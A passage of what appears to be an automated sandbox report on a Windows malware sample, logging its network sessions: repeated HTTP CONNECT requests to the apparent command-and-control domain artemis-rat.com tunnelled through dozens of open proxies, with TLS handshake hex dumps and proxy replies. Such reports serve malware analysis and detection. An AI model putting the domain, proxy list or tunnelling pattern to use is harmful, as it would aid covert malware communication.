                                              Mar 11, 2024 08:37:20.072913885 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee b4 ae d8 fe e5 cb 68 ac 77 5e b9 73 79 4d a0 d6 f0 8e fe b0 83 7f 4b 23 fd db 94 f1 36 a0 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: lhehw^syMK#6*,+0/$#('=<5/artemis-rat.com#$Vs 8x1d1x@O_5fwLKUp4e_ap{o
                                              Mar 11, 2024 08:37:20.339481115 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 fb 89 03 4e bd 20 0a 5b 41 13 6d e1 00 ca d6 03 ef 4b 1f 73 1f 4b 6f f8 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                              Data Ascii: =9N [AmKsKoDOWNGRD0000*H010Uartemis-rat.com0240311071229Z260311071229Z010Uartemis-rat.com0"0*H0eVz
                                              Mar 11, 2024 08:37:20.722985983 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 11 4b 9e b6 2c d2 f2 0a f1 d8 9b 63 c6 34 e0 ad 6f 96 31 b3 df a3 ea 28 0a 6c 12 cd b8 1a 6c 26 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 0d 83 0a c7 ab 61 27 80 c8 59 7b af 69 11 0d 6e 2f 23 df d0 9b
                                              Data Ascii: %! K,c4o1(ll&(a'Y{in/#PsuaX
                                              Mar 11, 2024 08:37:20.989007950 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 f0 6f 68 71 32 40 9d f6 27 3b 0f 04 45 59 43 15 7a e0 0c a6 c6 79 0b 6a 7d bd a0 07 4e 49 56 70 4b 40 6f 99 86 84 40 a4
                                              Data Ascii: (ohq2@';EYCzyj}NIVpK@o@


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              661192.168.2.45181058.20.21.23023237284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.802644968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.692435980 CET39INHTTP/1.0 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              662192.168.2.451115103.152.232.21781817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.802908897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.653981924 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              663192.168.2.45198194.131.14.6610817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.803133965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              664192.168.2.451141163.172.33.14831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.803354979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.925672054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.019956112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.037754059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              665192.168.2.451194107.178.9.18680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.804267883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.468739033 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              666192.168.2.451732117.160.250.132807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.804439068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.363923073 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              667192.168.2.45209213.208.168.17931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.804626942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.083178997 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              668192.168.2.45206123.137.248.19788887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.804727077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              669192.168.2.45198045.138.87.23810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.805557966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              670192.168.2.452070178.62.7.98404837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.814805031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              671192.168.2.452134160.248.80.91807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.814904928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              672192.168.2.452005113.143.37.8290027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.815007925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              673192.168.2.4520234.144.161.159807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.815165043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.152138948 CET59INHTTP/1.1 200 Connection Established
                                              Proxy-agent: nginx
                                              Mar 11, 2024 08:37:20.181830883 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee b4 af df f7 5b bc e3 75 2f d5 d3 a2 e9 64 e7 a7 e5 28 fb fb fd fc 3f c2 7f 74 ae 70 81 10 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: lhe[u/d(?tp*,+0/$#('=<5/artemis-rat.com#8>5rIN_SsCW/ly[($nK".v+.,'
                                              Mar 11, 2024 08:37:20.524717093 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ee b4 b0 9d 8e 64 d8 75 dc b1 3d cc 1c d9 6d 99 b8 d7 75 c9 06 cb da 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                              Data Ascii: C?edu=muDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                              Mar 11, 2024 08:37:20.524801970 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                              Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                              Mar 11, 2024 08:37:20.524888039 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                              Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                              Mar 11, 2024 08:37:20.524894953 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                              Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                              Mar 11, 2024 08:37:20.724033117 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 35 29 40 a1 8d 87 fa 2b 56 4e 57 b1 ec dc 64 2c e5 60 0e bb 29 87 9c de 60 e9 fa 19 f0 5e 60 4f 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 24 e1 29 8a 64 e6 0b c5 b8 f7 df 82 08 7d 15 99 e6 8a 94 83 98
                                              Data Ascii: %! 5)@+VNWd,`)`^`O($)d}L80~{m
                                              Mar 11, 2024 08:37:21.062594891 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 db b6 5d f3 13 54 6f 69 7b 22 7f cc ca 39 f9 56 72 4d db d5 91 2b b0 86 e1 3d 87 e4 8c 48 6e 9d a2 36 14 34 fc 8d 3b b0 de 42 fa 38 06 6f 2e c6 b6 b4 05 76 b8 f9 2f 1f 72 61 5b a7 16 9e 12 ce 21 38 74
                                              Data Ascii: ]Toi{"9VrM+=Hn64;B8o.v/ra[!8tN`}uX1/kVBz #XUzXFMmy_W@&L^.nf\F)kgaBF:Bz;:qKiJ\(}`\5_9:
                                              Mar 11, 2024 08:37:21.068986893 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 0d 1e ea 37 1b a1 39 9d 8a bc 86 e6 42 bf b6 5d a9 b9 9d 27 b6 d3 dd df b5 12 d2 47 4f 26 17 7c eb b9 d7 ab 0f 45 ab 47 bb a5 fc c8 45 07 2f c5 e3 5d 03 92 8a d4 f9 13 25 e4 bd cc ae 1d c0 c4 77 2e db 9f 83
                                              Data Ascii: 79B]'GO&|EGE/]%w.^Xu9Xj&}8q<I5GM"`hm-OTcxOdF|D%B'$,C@:'y_6KgOEN8}u#GK]^4PM
                                              Mar 11, 2024 08:37:21.438293934 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 cc 7d 84 92 3d f6 3f c2 cb 71 ca 95 b4 3b 19 24 9a bb f0 0e a5 86 94 17 34 bf 06 5d d3 1a d9 98 94 85 3f 95 17 53 b4 e0 85 e4 28 f6 75 18 69 92 97 7f 3e 9e 5a e2 e3 25 12 05 73 1b e1 8d bd ae 0b f1 09 43 16
                                              Data Ascii: q}=?q;$4]?S(ui>Z%sCXRx05Vb8F3;WXt#S=x9cZVK~Ml:(VC1Z'-%!<Xv(md)/%}EnGTOC"O^"
                                              Mar 11, 2024 08:37:21.438332081 CET1286INData Raw: ea eb 62 fb 43 7a d8 b0 07 f3 06 94 dc f1 b9 30 a5 5b 0c 90 7f 68 82 16 aa a8 5b 3f 28 b2 76 28 cb 31 80 b2 ca 64 23 67 6e 64 93 c7 d7 a8 61 b6 40 ec 1b 4d 8e f8 e5 33 b3 de 0e 17 7d e2 ae 5a 76 53 8c ed 9b 90 c4 47 57 ab 8c dc 7e 49 d9 18 f0 2c
                                              Data Ascii: bCz0[h[?(v(1d#gnda@M3}ZvSGW~I,AgWx2lGH,]BEa4qQRe.0zCeAKLcr M7/<}&47#]ntHWh;qG+rdHYpyv6mGU


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              674192.168.2.45204020.206.106.19281237284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.815668106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.145092964 CET319INHTTP/1.1 403 Forbidden
                                              Server: squid
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 17
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              X-Cache: MISS from cdn-fintech.info
                                              X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                              Connection: keep-alive
                                              Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                              Data Ascii: ERR_ACCESS_DENIED


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              675192.168.2.4520893.212.148.19931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.838079929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.079406977 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              676192.168.2.45197252.80.19.20731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.838469982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.271927118 CET72INHTTP/1.1 200 Connection established
                                              Proxy-Agent: Fortinet-Proxy/1.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              677192.168.2.45209192.205.110.118154307284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.839088917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              678192.168.2.451984103.165.211.17431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.839188099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.663108110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866435051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.163415909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.663404942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.069662094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.944593906 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              679192.168.2.452256104.16.109.207807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.839354992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.993964911 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              680192.168.2.452144147.75.92.251100897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.839468956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.121655941 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              681192.168.2.451930115.167.124.7580807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.839598894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.858129025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.163614035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.846507072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.054243088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.817502975 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              682192.168.2.451974115.127.31.6680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.839729071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              683192.168.2.452284104.16.241.204807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.839875937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
